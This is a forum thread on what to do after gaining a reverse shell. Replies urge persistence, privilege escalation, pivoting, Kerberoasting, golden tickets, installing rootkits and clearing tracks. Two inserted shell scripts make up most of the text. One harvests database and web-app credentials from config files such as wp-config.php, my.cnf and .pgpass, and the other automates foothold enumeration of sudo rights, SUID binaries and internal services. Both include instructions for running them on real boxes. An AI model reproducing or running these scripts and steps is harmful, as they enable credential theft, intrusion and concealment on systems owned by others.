
Post exploitation techniques after a successful reverse shell

Escalating privileges can be a good start; on a web application server you might
find credentials in DBMS configuration files.

Do some pivoting: use the credentials and explore old services and systems (such as MS17-010 vulnerable machines),
and after getting a shell on the system there are a number of ways to continue exploring, such as Kerberoasting attacks, silver/golden ticket attacks, etc.

Maintain persistence, escalate privileges on at least one server, and install a rootkit.

And last but not least,
do great recon on your scope.
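The credential hunt the post mentions, as an added example that is not from the thread: a POSIX shell function that checks the config locations where web apps and DBMS clients usually keep passwords, skips commented-out lines, and prints FILE:LINE:CONTENT for each hit. The file list, the keyword pattern, the lab tree built by `make_lab` and the fake credentials in it are my assumptions, constructed so the script can be rehearsed offline against a throwaway directory instead of a real /.

```sh
#!/bin/sh
# Added example (not from the thread): hunt for DBMS and web-app credentials
# in the config files where they usually live.
#   hunt_creds [ROOT]   scan the paths below under ROOT (default /) and print
#                       FILE:LINE:CONTENT for every credential-looking setting
set -u

# Assumed list of files that routinely hold database credentials, relative to
# ROOT; extend it for whatever stack you actually find on the box.
CRED_FILES='var/www/html/wp-config.php
var/www/html/.env
var/www/html/config.php
var/www/html/sites/default/settings.php
etc/mysql/my.cnf
etc/mysql/debian.cnf
root/.my.cnf
root/.pgpass'

# Setting names worth matching (extended regex, matched case-insensitively).
CRED_PATTERN='(DB_PASSWORD|DB_USER|DB_HOST|password|passwd|secret|api[_-]?key)'

# grep_creds REL FILE: print LINE:CONTENT for the credential-looking lines.
grep_creds() {
    case "$1" in
        *.pgpass)
            # Every non-comment line is hostname:port:database:username:password.
            grep -nvE '^[[:space:]]*(#|$)' "$2" ;;
        *)
            # Drop lines commented out with #, // or ; so a stale example in a
            # comment is not mistaken for a live secret.
            grep -nEi "$CRED_PATTERN" "$2" |
                grep -vE '^[0-9]+:[[:space:]]*(#|//|;)' ;;
    esac
    return 0
}

hunt_creds() {
    root="${1:-/}"
    for rel in $CRED_FILES; do
        f="${root%/}/$rel"
        [ -r "$f" ] || continue
        grep_creds "$rel" "$f" | while IFS= read -r hit; do
            printf '%s:%s\n' "$f" "$hit"
        done
    done
    return 0
}

# make_lab DIR: constructed tree with fake credentials (sample data, not from
# any real system) so the hunt can be rehearsed without touching a live box.
make_lab() {
    mkdir -p "$1/var/www/html" "$1/etc/mysql" "$1/root"
    cat > "$1/var/www/html/wp-config.php" <<'EOF'
<?php
// define('DB_PASSWORD', 'old-example');   // commented out: must be skipped
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_app');
define('DB_PASSWORD', 'S3cret-lab-only');
define('DB_HOST', '10.0.5.12');
EOF
    printf '[client]\nuser=debian-sys-maint\npassword = lab-only-pass\n' \
        > "$1/etc/mysql/debian.cnf"
    printf '# hostname:port:database:username:password\n10.0.5.13:5432:*:app:pg-lab-only\n' \
        > "$1/root/.pgpass"
}

# Run directly against a real root:  sh hunt_creds.sh /
[ $# -ge 1 ] && hunt_creds "$1"
```

The DB_HOST hit matters as much as the password: on the lab tree it points at 10.0.5.12, an internal address that is exactly the kind of pivot target the post goes on to describe. Against a real box, run `sh hunt_creds.sh /` and expect only the files that exist to be reported.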
 
What are good ways of exploiting a system after getting a successful reverse shell? Exploiting cmd commands.

You want to get persistence; you can search for old versions being used on the machine to exploit, you can try to crack /etc/passwd, you ideally want to gain/pivot access and install a rootkit, etc.
 
Bash:
Post-Exploitation Methodology
│
├── 1 - Local Enumeration
│    ├── Enumerating System Information
│    ├── Enumerating Users And Groups
│    ├── Enumerating Network Information
│    ├── Enumerating Services
│    └── Automating Local Enumeration
│
├── 2 - Transferring Files
│    ├── Setting Up A Web Server With Python
│    ├── Transferring Files To Windows Targets
│    └── Transferring Files To Linux Targets
│
├── 3 - Upgrading Shells
│    ├── Upgrading Command Shells To Meterpreter
│    └── Spawning TTY Shells
│
├── 4 - Privilege Escalation
│    ├── Identifying PrivEsc Vulns
│    ├── Windows PrivEsc
│    └── Linux PrivEsc
│
├── 5 - Persistence
│    ├── Setting Up Persistence On Windows
│    └── Setting Up Persistence On Linux
│
├── 6 - Dumping & Cracking Hashes
│    ├── Dumping & Cracking Windows Hashes
│    └── Dumping & Cracking Linux Hashes
│
├── 7 - Pivoting
│    ├── Internal Network Recon
│    └── Pivoting
│
└── 8 - Clearing Your Tracks
    └── Clearing Your Tracks On Windows & Linux
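The "Automating Local Enumeration" step from the outline, as an added example that is not from the post: a small POSIX shell collector covering the first four items (system, users and groups, network, services) that degrades gracefully when a tool is missing, so the same file runs unchanged on a stripped-down container and on an old server. The section names and the choice of commands are mine.

```sh
#!/bin/sh
# Added example (not from the post): automated local enumeration for a fresh
# Linux foothold, covering system, users/groups, network and services.
#   enum_all REPORT   write all four sections to REPORT
# Each enum_* function also works on its own once this file is sourced.
set -u

# Run a tool only if it is on PATH and note the gap otherwise: minimal
# containers and old servers lack ip/ss/systemctl more often than not, and an
# enumeration script that dies on the first missing binary is useless there.
run_if() {
    if command -v "$1" >/dev/null 2>&1; then
        "$@" 2>/dev/null || true
    else
        printf '[not available: %s]\n' "$1"
    fi
}

enum_system() {
    printf '== System ==\n'
    run_if uname -a
    grep -E '^(PRETTY_NAME|VERSION_ID)=' /etc/os-release 2>/dev/null || true
    run_if hostname
    return 0
}

enum_users() {
    printf '== Users and groups ==\n'
    printf 'current: %s\n' "$(id)"
    # Accounts that can actually log in: UID 0 or >= 1000 with a real shell.
    awk -F: '($3 == 0 || $3 >= 1000) && $7 !~ /(nologin|false)$/ { print $1 ":" $3 ":" $7 }' \
        /etc/passwd 2>/dev/null || true
    # -n never prompts, so this is safe to run blind; any output means sudo rights.
    run_if sudo -n -l
    return 0
}

enum_network() {
    printf '== Network ==\n'
    if command -v ip >/dev/null 2>&1; then run_if ip -o addr; else run_if ifconfig -a; fi
    # Listening sockets expose internal-only services (DBMS, admin panels) that
    # are invisible from outside; those are the usual pivot targets.
    if command -v ss >/dev/null 2>&1; then run_if ss -tulpn; else run_if netstat -tulpn; fi
    grep -vE '^[[:space:]]*(#|$)' /etc/hosts 2>/dev/null || true
    return 0
}

enum_services() {
    printf '== Services ==\n'
    run_if systemctl list-units --type=service --state=running --no-pager --no-legend
    printf '%s\n' '-- SUID binaries (classic privesc candidates) --'
    find / -xdev -perm -4000 -type f 2>/dev/null | head -n 40
    printf '%s\n' '-- Scheduled jobs --'
    ls /etc/cron.d 2>/dev/null || true
    crontab -l 2>/dev/null || true
    return 0
}

enum_all() {
    { enum_system; enum_users; enum_network; enum_services; } > "$1"
}

# Run directly:  sh enum.sh /tmp/report.txt
[ $# -ge 1 ] && enum_all "$1"
```

Writing the report to a file rather than the terminal is deliberate: over a raw reverse shell, long output scrolls past and is lost, and the file can be pulled back with the transfer step from the outline. Delete it before leaving the box.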
 
Did you extract this from somewhere you can share? :)
 
It's easy to find something like that these days.
Yes, I did make such a cheat sheet for everything from recon to data exfiltration; only I don't have the right cheat sheet for persistence. I've searched a bit, but I haven't found anything really good.
 

